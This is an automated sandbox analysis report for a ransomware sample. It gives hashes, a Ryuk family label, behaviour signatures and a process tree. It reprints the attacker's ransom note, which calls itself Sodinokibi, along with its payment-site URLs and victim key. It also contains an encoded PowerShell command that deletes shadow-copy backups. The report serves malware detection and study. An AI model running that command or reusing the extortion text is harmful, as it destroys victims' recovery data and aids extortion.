Analysis

  • max time kernel
    165s
  • max time network
    176s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 01:26

General

  • Target

    a1fac06c8653b71354e10d3978d84eff7709542501c9f80ce86cb84a2dd8b593.exe

  • Size

    164KB

  • MD5

    30058c94c8472f2f4521779da4a7fe80

  • SHA1

    f5525401a01ac6c7a600b0d6d47b84a23854d775

  • SHA256

    a1fac06c8653b71354e10d3978d84eff7709542501c9f80ce86cb84a2dd8b593

  • SHA512

    c7789f687aa567206b59ae3e16e1a81493db0313aa0df0d52dfc33ced67df87a0698ba1a9750f2ccad914f084fbc0ad5ad32cbf96aa6ba930c18dd616d7ce3bb

Score
10/10

Malware Config

Extracted

Path

C:\gc66e-readme.txt

Family

ryuk

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension gc66e. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. I suggest you read about us on the Internet, we are known as "Sodinokibi Ransomware". For example, this article: https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread Pay attention to that: "How Much Data Is Decrypted with a Ransomware Decryptor? In Q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. This statistic varied dramatically depending on the ransomware type. For example, Ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while Sodinokibi was close to 100%. " Now you have a guarantee that your files will be returned 100 %. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F266E14940A42AEC 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/F266E14940A42AEC Warning: secondary website can be blocked, thats why first variant much better and more available. If you have problem with connect, use strictly TOR version 8.5.5 link for download TOR version 8.5.5 here: https://filehippo.com/download_tor_browser_for_windows/ When you open our website, put the following data in the input form: Key: gnZij9whYs9w+q38T2f9WZTNzMdMDUO12ruuHuma+Ti7ptlvryFYDforECUK5zDW h3Yd2KY2WazE3PlpYr0/65FbWftSWJU3O883ajjUPXnZCsxJthdXYNL4d3iT7EAC 1kqGDIP8IR4b9rzQPDDRg+QwKN8ukPKSnLi64RpvTtavNqUKdxwnR4iHdqCMhozX WdLhV/JW9THqHLnhKAUFRhDhSmd4ABy9lLhle26NCrm/jVJCwwDkG/70afDtbqiq X0BsuA/VS1Xf2enejO8g+5Sy/GNVn5ctWIJyOK5AX5fGmjcF789ISP8OFLvCqow+ KpPxKPqatZ7povwFcswp0NYf4eLeoPcQj0MhdBTclSZ/Pe8tNk0WXwPUqngyudIi zIAYSJ0pTm5ZmbIfp/pA40iUTPwuKYy0kbOKE1AZXG3Ygz/XP8GxrePB55xe/TeK Dy4bvrRxxMg9AXlZAta9BTVuZpLGRSLreaDav4qdDBtrWHWytfVo+hy2e5Dhqzms E/CaFLsMMn092s8Yr/02xDh9Uq+OTLaZNmRBJKNRgnwrCOgQT4JFUUWLDngn4ejH 2lTfdhSAiNz28jIcEU8C6HlySVa+XNj2t4lAcT/B2WPco5OmzLtmFo2Y9l0ZprEZ ggR8/xcoLL1NC/d+QE7MuIaSRqNo7Kfl7JBcccZ99Wk17dBtdnq1DE8ibX0Wqi69 nK2fUyL0ucBLZkLjCRtRg+hlhAIPKC2cRg90B5gmwsXCbPTY3RfsVuy//8wb0F84 NQbWWaTQM5QdwzXdtzIxPVYd8G1Z0KkV+rzzVi+/AWDPoaUnLJum02aX2MbG8yJk f2Qae6+l8g1l2sa3uwIUq8wmvkKppm412J6mn/WMQqHfM7dPmoGT0GY0CWqByUfi KwUEXxXuA16ND6tlgR3xALwEinehKZ0zlMc9o7uz5BhEMxmH+n5X6GXPU3leYn/B hthZbUhNHifJ6znQbWOisf3WldpDS8gTYvfoe6KkZPrhmQqaPU9Tu+tV3FMW5/7M S4VmpX8Z1TiWoUX0xsYXgx1F/2cUsoX2lceANlo2B06GxbAH+H2CezzIgtxfC/gW 08/VUUGuon+9LfcSvkn9+eJWSKspFjPcvrao+QEAjHXaMPdlIRpN9jxS Extension name: gc66e ----------------------------------------------------------------------------------------- postscript: In case you want to independently decrypt your servers, we will be forced to put the databases of your companies in the public domain. MDF files: DB_UTILITY LeasePlus LPSecurity LTShared PaperVision !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F266E14940A42AEC

http://decryptor.top/F266E14940A42AEC

https://filehippo.com/download_tor_browser_for_windows/

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 30 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a1fac06c8653b71354e10d3978d84eff7709542501c9f80ce86cb84a2dd8b593.exe
    "C:\Users\Admin\AppData\Local\Temp\a1fac06c8653b71354e10d3978d84eff7709542501c9f80ce86cb84a2dd8b593.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1648
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1004
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:896

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1648-122-0x000002067CDF0000-0x000002067CE12000-memory.dmp

      Filesize

      136KB

    • memory/1648-123-0x0000020664840000-0x0000020664842000-memory.dmp

      Filesize

      8KB

    • memory/1648-124-0x0000020664843000-0x0000020664845000-memory.dmp

      Filesize

      8KB

    • memory/1648-127-0x000002067CFA0000-0x000002067D016000-memory.dmp

      Filesize

      472KB